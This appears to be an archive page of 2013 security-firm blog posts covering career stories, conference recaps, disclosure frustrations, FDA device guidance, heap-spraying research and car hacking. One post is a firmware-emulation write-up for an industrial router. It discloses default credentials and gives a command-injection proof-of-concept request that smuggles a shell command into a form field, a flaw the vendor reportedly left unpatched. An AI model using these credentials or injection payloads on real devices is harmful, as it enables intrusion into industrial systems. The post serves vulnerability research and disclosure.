INSIGHTS | October 16, 2013

A trip down cyber memory lane, or from C64 to #FF0000 teaming

So, it’s National Cyber Security Awareness Month, and here at IOActive we have been lining up some great content for you. Before we get to that, I was asked to put in a short post with some background on how I got to info sec, and what has been keeping me here for almost 20 years now.

Brace yourselves for a trip down memory lane then :-). For me getting into security didn’t start with a particular event or decision. I’ve always been intrigued by how things worked, and I used to take things apart, and sometimes also put them back together. Playing with Meccano, Lego, assorted electrical contraptions, radios, etc. Things got a bit more serious when I was about 6 or 7 when somehow I managed to convince my parents to get me one of those newfangled computers. It was a Commodore 64 (we were late adopters at the Amit residence), but the upside is I had a real floppy drive rather than a tape cassette 😉
That has been my introduction to programming (and hacking). After going through all the available literature I could get my hands on in Hebrew, I switched over to the English one (having to learn the language as I went along), and did a lot of basic programming (yes, BASIC programming). That’s also when I started to deal with basic software protection mechanisms.
Things got more real later on in my PC days, when I was getting back to programming after a long hiatus, and I managed to pick this small project called Linux and tried to get it working on my PC. Later I realized that familiarity with kernel module development and debugging was worth something in the real world in the form of security.
Ever since then, I find myself in a constant learning curve, always running into new technologies and new areas of interest that tangent information security. It’s what has been keeping my ADD satisfied, as I ventured into risk, international law, finances, economic research, psychology, hardware, physical security and other areas that I’m probably forgetting in the edits to this post (have I mentioned ADD?).
I find it hard to define “what I like to research” as my interest range keeps expanding and venturing into different areas. Once it was a deep dive into Voice over IP and how it can be abused to exfiltrate data, another time it was exploring the business side of cyber-crime and how things worked there from an “economy” perspective, other times it was purely defense based when I was trying to switch seats and was dealing with a large customer who needed to up their defenses properly. It even got weird at some point where I was dealing with the legal international implications of conflict in the 5th domain when working with NATO on some new advisories and guidance (law is FUN, and don’t let anyone tell you otherwise!).
I guess that for me it’s the mixture of technical and non-technical elements and how these apply in the real world… It kind of goes back to my alma-mater (The Interdisciplinary Center) where I had a chance to hone some of these research skills.
As for advice on to how to become a pentester / researcher / practitioner of information security? Well, that’s a tough one. I’d say that you would need to have the basics, which for me has always been an academic degree. Any kind of degree. I know that a lot of people feel they are not “learning” anything new in the university because they already mastered Ruby, Python, C++ or whatever. That’s not the point. For me the academia gave tools rather than actual material (yes, I also breezed through the programming portions of college). But that wouldn’t be enough. You’d need something more than just skills to stay in the industry. A keen eye for details, an inquisitive mind, at times I’d call it cunning, to explore things that are out of boundaries. And sometimes a bit of moxie (Chutzpa as it’s called in Hebrew) to try things that you aren’t completely allowed to. But safely of course 😉
Hope this makes sense, and maybe sheds some light on what got me here, and what keeps driving me ahead. Have a safe and enjoyable “Cyber” month! 🙂
INSIGHTS | October 15, 2013

IOActive supports National Cyber Security Awareness Month

The month of October has officially been deemed National Cyber Security Awareness Month (NCSAM). Ten years ago the US Department of Homeland Security and the National Cyber Security Alliance got together and began this commendable online security awareness initiative.  Why? Well, according to the Department of Homeland Security the NCSAM is seen as an opportunity to engage with businesses and the general public to create a ‘safe, secure and resilient cyber environment.’  This is something that resonates with the team here at IOActive.

The 10th anniversary of NCSAM looks ahead at the cyber security challenges for the next ten years. So, over the next few days and weeks we will be publishing some short blog posts from our researchers and consultants to show our support for this good cause.

The first round of posts – given that this week is slated to highlight the ‘cyber workforce and the next generation of cyber leaders’ – will be from our international research team giving insight into how they got into the world of cyber security. From getting their first computers, their studies through to what they enjoy most about security and why.

If anything, we hope these posts will help encourage our young generation to pick up their pens and their computers and explore the realm of cyber security.

 

So keep an eye out for these posts over the coming days. And if you have any questions or comments relating to the blog posts, please feel free to let us know. We welcome the discussion.
INSIGHTS | October 3, 2013

Seeing red – recap of SecurityZone, DerbyCon, and red teaming goodness

I was fortunate enough to have a chance to participate in a couple of conferences that I consider close to my heart in the past couple of weeks. First – SecurityZone in beautiful Cali ,Colombia. This is the third year that SecurityZone has been running, and is slowly making its way into the latin american security scene.

This year I delivered the keynote on the first day, and albeit being a bit harsh on the whole “let’s buy stuff so we can think we are secure” approach, it was very well received. Apparently, stating the “obvious” – which is that a security function in an organization is tasked with risk management of said organization, rather than with dealing purely with the technical IT infrastructure for it.
Next up was DerbyCon. I can’t stress enough how much fun it is to run the Red Teaming Training class with my best friend Chris, and the kind of feedback (and learning) we have a chance to get. The biggest return for us every time we deliver the training is watching the trainees open up and really “get” what red team testing is all about, and the kind of value it brings to the organization being tested. This moment of enlightenment is sheer joy from me still.
Speaking of DerbyCon – OMG what a conference! It’s just amazing what a small crew of dedicated individuals can come up with in such a short period of time. If you’d ask me for how long this con has been running I’d say at least 8-9 years. And this one was just the third iteration. Everything from the volunteer crew, through the hotel staff (major kudos to the Hyatt for taking DerbyCon on, and “working” with us – going well above just accommodating a conference venue).
My talk at DerbyCon focused on the “receiving end” of a red-team, which articulates what an organization should do in order to thoroughly prepare for such an engagement, and maximize the impact from it and the returns in the form of improving the organizational efficiency and security posture. I had a lot of great feedback on it, and some excellent conversations with people who have been struggling to get to that “buy-in” point in their organizations. Really hoped that I managed to help a bit in figuring out how to more accurately convey the advantages and ROI of such an engagement to the different internal groups.
I’m really looking forward to getting more feedback on it, and more discussions on how to communicate the essence of red teaming to organizations – which is always a challenge in internal organization politics.
Following are the slides. Have fun!
INSIGHTS | September 10, 2013

Vulnerability bureaucracy: Unchanged after 12 years

One of my tasks at IOActive Labs is to deal with vulnerabilities; report them, try to get them fixed, publish advisories, etc. This isn’t new to me. I started to report vulnerabilities something like 12 years ago and over that time I have reported hundreds of vulnerabilities – many of them found by me and by other people too.

Since the early 2000’s I have encountered several problems when reporting vulnerabilities:
  • Vendor not responding
  • Vendor responding aggressively
  • Vendor responding but choosing not to fix the vulnerability
  • Vendor releasing flawed patches or didn’t patch some vulnerabilities at all
  • Vendor failing to meet deadlines agreed by themselves

It’s really sad to tell that, as of right now, 12 years later, I continue to see most (if not all) of the same problems. Not only that, but some organizations that are supposed to help and coordinate vulnerability reporting and disclosure (CERTs) are starting to fail, being non responsive and not contributing much to the effort.

This shouldn’t be a big problem if you are reporting low impact or unimportant vulnerabilities, but most of the time the team here at IOActive report critical vulnerabilities affecting systems ranging from critical infrastructure to the most popular commercial applications, OS’s, etc. used by millions of people around the world. There is a big responsibility upon us to work with the affected vendors to get the vulnerabilities fixed and thinking about how bad things could be if they are exploited.

It’s also surprising to sometimes see the tardy response from some teams that are supposed to act and respond fast such as Android security team given that Google has some strong vulnerability polices (12):

It would be nice if most vendors, CERTs, etc. are aware of the following:
  • Independent researchers and security consulting companies report vulnerabilities on a voluntary basis.
  • Independent researchers and security consulting companies have no obligation to report security vulnerabilities.
  • Independent researchers and security consulting companies often invest a lot of time, effort and resources finding vulnerabilities and trying to get them fixed.
  • Vendors and CERTs should be more appreciative of the people reporting vulnerabilities and, at the very least, be more responsive than they typically are today.
  • Vendors and CERTs should adhere and comply with their own defined deadlines.
I would like for vendors and CERTs to start improving a little and becoming more responsive; the attack surface grows everyday and vulnerabilities affect our lives more and more. The more we depend on technology the more the vulnerabilities will impact us.

There shouldn’t be vulnerability bureaucracy.

If there’s one thing that vendors and CERTs could do to improve the situation, that would be for them to step-up and be accountable for the vulnerability information entrusted to them.

 

I hope that in the following 12 years something will change for the better.
INSIGHTS | September 3, 2013

Emulating binaries to discover vulnerabilities in industrial devices

Emulating an industrial device in a controlled environment is a really helpful security tool. You can gain a better knowledge of how it works, identify potential attack vectors, and verify the vulnerabilities you discovered using static methods.
This post provides step-by-step instructions on how to emulate an industrial router with publicly available firmware. This is a pretty common case, so you should be able to apply this methodology to other scenarios.
The target is the Waveline family of industrial routers from the German automation vendor Weidmüller. The firmware is publicly available at its website.
 
 
Firmware
Envision the firmware as a matryoshka doll, commonly known as a Russian nesting doll. Our goal is to find the interesting part in the firmware, the innermost doll, by going through the different outer layers. Binwalk will be our best friend for this task.
We found the following two files when we unzipped the firmware:
IE-AR-100T-WAVE_firmware
meta-inf.xml
 
$ tar -jxvf IE-AR-100T-WAVE_firmware
x deviceID
x IE-AR-100T-WAVE_uImage
We found uImage firmware, so now we search for any embedded file system by dumping it.
$ binwalk IE-AR-100T-WAVE_uImage 
DECIMAL   HEX       DESCRIPTION
——————————————————————————————————-
0         0x0       uImage header, header size: 64 bytes, header CRC: 0x520DABFB, created: Tue Jun 30 09:32:08 2009, image size: 9070000 bytes, Data Address: 0x8000, Entry Point: 0x8000, data CRC: 0xD822B635, OS: Linux, CPU: ARM, image type: OS Kernel Image, compression type: none, image name: Linux-2.6.25.20
12891     0x325B    LZMA compressed data, properties: 0xD4, dictionary size: 1543503872 bytes, uncompressed size: 536870912 bytes
14096     0x3710    gzip compressed data, from Unix, last modified: Tue Jun 30 09:32:07 2009, max compression
4850352   0x4A02B0  gzip compressed data, has comment, comment, last modified: Fri Jan 12 11:25:10 2029
We use the handy option ‘–dd’ to extract the gz file located at offset 0x3710.
$ binwalk –dd=gzip:gz:1 IE-AR-100T-WAVE_uImage
Now we have 3710.gz, so we use ‘gunzip + binwalk’ one more time.
$ binwalk 3710 
DECIMAL   HEX       DESCRIPTION
——————————————————————————————————-
89440     0x15D60   gzip compressed data, from Unix, last modified: Tue Jun 30 09:31:59 2009, max compression
We extract the gzip blob at 0x15D60.
$ binwalk –dd=gzip:gz:1 3710
$ file 15D60 
15D60: ASCII cpio archive (SVR4 with no CRC)
As a last step, we create a new directory (‘ioafs’) where the contents of this cpio file will be extracted.
$ cpio -imv –no-absolute-filenames < 15D60
We finally have the original filesystem.
We look at an arbitrary file to see what platform it was built for.
Now we are ready to build an environment to execute those ARM binaries using QEMU user-mode emulation.
1.Compile qemu statically.
./configure –static –target-list=armeb-linux-user –-enable-debug
2. Copy the resulting binary from ‘armeb-linux-user/qemu-armeb’ to the target filesystem ‘ioafs/usr/bin’.
3. Copy the target’s lib directory (‘ioafs/lib’) into ‘/usr/gnemul/qemu-arm’ (you may need to create this directory). This will allow qemu-arm’s user-mode emulation use the target’s libraries.
4. Enable additional ‘binmfts’ in the kernel.
$ echo “:armeb:M::x7fELFx01x02x01x00x00x00x00x00x00x00x00x00x00x02x00x28 :xffxffxffxffxffxffxffx00xffxffxffxffxffxffxffxffxffxfexffxff: /usr/bin/qemu-armeb:” > /proc/sys/fs/binfmt_misc/register
5. Bind your ‘dev’ and ‘proc’ to the target environment.
$ mount -o bind /dev ioafs/dev
$ mount -t proc proc ioafs/proc
6. ‘chroot’ into our emulated device (‘ioafs’).
$ chroot . bin/ash
Finding Vulnerabilities
 
From this point, hunting for vulnerabilities is pretty much the same as in any other *nix environment (check for proprietary services, accounts, etc.).
Today, almost all industrial devices have an embedded web server. Some of them use this interface to expose simple functionality for checking status, but others allow the operator to configure and control the device. The first thing to look for is a private key that could be used to implement MITM attacks.
Waveline routers use a well-known http server, lighttpd. We look in ‘/etc/lighttpd’ and find the private key at ‘/etc/lighttpd/wm.pem’.

We see that ‘/etc/init.d/S60httpd’ starts the lighttpd web server and can be used to configure its authentication.

If we decompress ‘/etc/ulsp_config.tgz’ we can find the SYSTEM_USER_PASS in ‘system.config’.
 
We have just discovered that the default credentials are ‘admin:detmold’.
We start the service and access the web interface.
We can now analyze the server’s DOCUMENT_ROOT (‘/home/httpd’) to see what kind of content is being served.
The operator can fully configure the device via several CGIs. We discover something interesting by reversing ‘config.cgi’.
As we can see in the menu, one of the options allows the operator to change the system time. However, this CGI was not designed with security in mind, and it allows an attacker to make other changes. The CGI is not filtering the input data from the web interface. Therefore, the ‘system’ call can be invoked with arbitrary values, leading to remote command injection vulnerability. If the operator is tricked into visiting a specially crafted website, this flaw can be exploited using a CSRF.
Proof of Concept
POST /config.cgi HTTP/1.1
Host: nsa.prism
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,ar-jo;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
lang=englis&item=2&act=1&timemode=man&tzidx=0&jahr=2012&monat=|echo 1 >/home/httpd/amipowned&tag=07&std=21&min=00&sek=3
There are some additional vulnerabilities in this device, but those are left as an exercise for the reader.
These vulnerabilities were properly disclosed to the vendor who decided not to release a patch due to the small number of devices actually deployed.
INSIGHTS | August 23, 2013

IE heaps at Nordic Security Conference

Remember when I used to be the Windows Heap guy? Yeah, me neither ;). I just wanted to give everyone a heads up regarding my upcoming presentation “An Examination of String Allocations: IE-9 Edition” at Nordic Security Conference (www.nsc.is). The presentation title is a bit vague so I figured I would give a quick overview.
First, I’ll briefly discuss the foundational knowledge regarding heap based memory allocations using JavaScript strings in IE-6 and IE-7. These technics to manipulate the heap are well documented and have been known for quite some time [1].

While heap spraying and allocation techniques have continued to be used, public documentation of such techniques has been lacking. I specifically remember Nico Waisman talking about using the DOM [2] to perform precise allocations, but I don’t recall specific details being released. Nico’s presentation inspired me to reverse engineer a small portion of IE-9’s JavaScript implementation when it came to string based memory manipulation techniques. (Editor’s note: I’ve been holding onto this for 2 years, WTF Chris?).

Next I’ll cover, in detail, the data structures and algorithms used in IE-9 that are common during the exploitation process when performing typical string manipulations. Hopefully the details will give insight into what actually happens for vanilla exploitation attempts.

Lastly, I’ll demo a library which I’m calling heapLib2. HeapLib2 is an extension of Alex Sotirov’s original heap library that will work with modern versions of Internet Explorer when requiring precise heap-based allocations. You can now do some neat memory tricks with a few simple lines.

 



One final reflection; if you haven’t been to Nordic Security Conference (or Iceland in general) you should consider going. The conference has an attentive but laid back atmosphere while providing both highly technical and high level security presentations. If you’ve been looking for an excuse to go to Iceland get yourself to Nordic Security Conference!

 
[1] – http://www.phreedom.org/research/heap-feng-shui/
P.S. These techniques _MAY_ work with versions of IE that are greater than version 9

 

P.P.S. Ok, they DO work.
INSIGHTS | August 20, 2013

FDA Medical Device Guidance

Last week the US Food and Drug Administration (FDA) finally released a couple of important documents. The first being their guidance on using radio frequency wireless technology in medical devices (replacing a draft from January 3,2007), and a second being their new (draft) guidance on premarket submission for management of cybersecurity in medical devices.

The wireless technology guidance document seeks to address many of the risks and vulnerabilities that have been disclosed in medical devices (embedded or otherwise) in recent years – in particular those with embedded RF wireless functionality…

The recommendations in this guidance are intended for RF wireless medical devices including those that are implanted, worn on the body or other external wireless medical devices intended for use in hospitals, homes, clinics, clinical laboratories, and blood establishments.  Both wireless induction-based devices and radiated RF technology device systems are within the scope of this guidance.

The FDA wishes medical device manufacturers to consider the design, testing and use of wireless medical devices…

In the design, testing, and use of wireless medical devices, the correct, timely, and secure transmission of medical data and information is important for the safe and effective use of both wired and wireless medical devices and device systems. This is especially important for medical devices that perform critical functions such as those that are life-supporting or life-sustaining. For wirelessly enabled medical devices, risk management should include considerations for robust RF wireless design, testing, deployment, and maintenance throughout the life cycle of the product.

For most of you reading the IOActive Labs blog, the most important parts of the guidance document are the advice on security and securing “wireless signals and data”. Section 3.d covers this…

Security of RF wireless technology is a means to prevent unauthorized access to patient data or hospital networks and to ensure that information and data received by a device are intended for that device. Authentication and wireless encryption play vital roles in an effective wireless security scheme. While most wireless technologies have encryption schemes available, wireless encryption might need to be enabled and assessed for adequacy for the medical device’s intended use. In addition, the security measures should be well coordinated among the medical device components, accessories, and system, and as needed, with a host wireless network. Security management should also consider that certain wireless technologies incorporate sensing of like technologies and attempt to make automatic connections to quickly assemble and use a network (e.g., a discovery mode such as that available in Bluetooth™ communications). For certain types of wireless medical devices, this kind of discovery mode could pose safety and effectiveness concerns, for example, where automatic connections might allow unintended remote control of the medical device. 

FDA recommends that wireless medical devices utilize wireless protection (e.g., wireless encryption,6 data access controls, secrecy of the “keys” used to secure messages) at a level appropriate for the risks presented by the medical device, its environment of use, the type and probability of the risks to which it is exposed, and the probable risks to patients from a security breach. FDA recommends that the following factors be considered during your device design and development: 

* Protection against unauthorized wireless access to device data and control. This should include protocols that maintain the security of the communications while avoiding known shortcomings of existing older protocols (such as Wired Equivalent Privacy (WEP)). 

* Software protections for control of the wireless data transmission and protection against unauthorized access. 

Use of the latest up-to-date wireless encryption is encouraged. Any potential issues should be addressed either through appropriate justification of the risks based on your device’s intended use or through appropriate design verification and validation.

Based upon the parts I’ve highlighted above, you’ll probably be feeling a little foreboding. From a “guidance” perspective, it’s less useful than a teenager with a CISSP qualification. The instructions are so general as to be useless.

If I was the geek charged with waving the security batton at some medical device manufacturer I wouldn’t be happy at all. Effectively the FDA are saying “there are a number of security risks with wireless technologies, here are some things you could think about doing, hope that helps.” Even if you followed all this advice, the FDA could turn around later during your submission for certification and say you did it wrong…

The second document the FDA released last week (Content of Premarket Submissions for Management of Cybersecurity in Medical Devices – Draft Guidance for Industry and Food and Drug Administration Staff) is a little more helpful – at the very least they’re talking about “cybersecurity” and there’s a little more meat for your CISSP folks to chew upon (in fact parts of it read like they’ve been copy-pasted right out of a CISSP training manual).

This guidance has been developed by the FDA to assist industry by identifying issues related to cybersecurity that manufacturers should consider in preparing premarket submissions for medical devices. The need for effective cybersecurity to assure medical device functionality has become more important with the increasing use of wireless, Internet- and network-connected devices, and the frequent electronic exchange of medical device-related health information.

Again, it doesn’t go in to any real detail of what device manufacturers should or shouldn’t be doing, but it does set the scene for understanding the scope of part of the threat.

If I was an executive at one of the medical device manufacturers confronted with these FDA Guidance documents for the first time, I wouldn’t feel particularly comforted by them – in fact I’d be more worried about the increased exposure I would have in the future. If a future product of mine was to get hacked, regardless of how close I thought I was following the FDA guidance, I’d be pretty sure that the FDA could turn around and say that I wasn’t really in compliance.

With that in mind, let me slip on my IOActive CTO hat and clearly state that I’d recommend any medical device manufacturer that doesn’t want to get bitten in the future for failing to follow this FDA “guidance” reach out to a qualified security consulting company to get advice on (and to assess) the security of current and future product lines prior to release.

Engaging with a bunch of third-party experts isn’t just a CYA proposition for your company. Bringing to bear an external (impartial) security authority would obviously add extra weight to the approval process; proving the companies technical diligence, and working “above and beyond” the security checkbox of the FDA guidelines. Just as importantly though, securing wireless technologies against today’s and tomorrow’s threats isn’t something that can be done by an internal team (or a flock of CISSP’s) – you really do need to call in the experts with a hackers-eye for security… Ideally a company with a pedigree in cutting-edge security research, and I know just who to call…

INSIGHTS | August 5, 2013

Car Hacking: The Content

Hi Everyone, 
As promised, Charlie and I are releasing all of our tools and data, along with our white paper. We hope that these items will help others get involved in automotive security research. The paper is pretty refined but the tools are a snapshot of what we had. There are probably some things that are deprecated or do not work, but things like ECOMCat and ecomcat_api should really be all you need to start with your projects. Thanks again for all the support! 
 
Content: http://illmatics.com/content.zip

 

WHITEPAPER |

Car Hacking Made Affordable

This research focuses on reducing the barrier to entry for automotive security assessments. The goal is to increase the number of security researchers working in this area by providing step-by-step information on how to evaluate, test, and assess Electronic Control Units (ECUs) without requiring a vehicle.

To accomplish the work described in this paper, you only need inexpensive electronics and an ECU. Most, if not all, of the equipment and vehicle parts can be acquired from third-party sources, such as eBay or Amazon.

(more…)

WHITEPAPER | July 31, 2013

Adventures in Automotive Networks and Control Units

Previous research has shown that an attacker can execute remote code on the electronic control units (ECU) in automotive vehicles via interfaces such as Bluetooth and the telematics unit:  https://www.autosec.org/pubs/cars-usenixsec2011.pdf.

This paper expands on the topic and describes how an attacker can influence a vehicle’s behavior. It includes examples of mission critical controls, such as steering, braking, and acceleration, being manipulated using Controller Area Network (CAN) messages. (more…)